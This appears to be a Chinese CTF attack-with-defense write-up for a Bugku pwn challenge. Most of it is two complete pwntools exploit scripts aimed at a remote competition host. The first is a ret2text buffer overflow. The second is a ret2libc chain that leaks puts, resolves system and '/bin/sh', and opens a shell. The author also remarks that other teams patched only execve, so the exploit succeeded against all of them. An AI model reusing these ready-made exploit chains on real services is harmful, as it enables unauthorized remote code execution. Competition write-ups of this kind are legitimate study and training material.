Bugku S3 AWD排位赛-5 pwn
栈溢出,直接ret2text
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './pwn'
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
context.terminal = ['tmux','splitw','-h']
debug = 1
if debug:
r = remote('192-168-1-26.awd.bugku.cn', 9999)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
shell = 0x4006CE
p1 = b'a' * (0x30 + 8) + p64(shell)
r.sendlineafter('Please tell me your name: ', p1)
r.interactive()
修漏洞这里笔者直接把execve(“/bin/sh”, 0LL, 0LL);改成execve(0, 0LL, 0LL);,但转念一想,gets这个漏洞大部分人都不会修,所以笔者就直接写了第二份exp,也就是ret2libc
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './pwn'
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
context.terminal = ['tmux','splitw','-h']
debug = 1
if debug:
r = remote('192-168-1-26.awd.bugku.cn', 9999)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
'''
shell = 0x4006CE
p1 = b'a' * (0x30 + 8) + p64(shell)
r.sendlineafter('Please tell me your name: ', p1)
'''
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main_addr = elf.sym['main']
pop_rdi_ret = 0x00000000004007b3
p1 = b'a' * (0x30 + 8) + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
r.sendlineafter('Please tell me your name: ', p1)
puts_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
li('puts_addr = ' + hex(puts_addr))
libc = ELF('../ppp/libc.so.6')
libc_base = puts_addr - libc.sym['puts']
bin_sh = libc_base + libc.search(b'/bin/sh').__next__()
system_addr = libc_base + libc.sym['system']
ret = 0x000000000040053e
p2 = b'a' * (0x30 + 8) + p64(ret) + p64(pop_rdi_ret) + p64(bin_sh) + p64(system_addr)
r.sendlineafter('Please tell me your name: ', p2)
r.interactive()
结果不出所料,有些队只会修execv,但是不会修gets,所以成功打到全场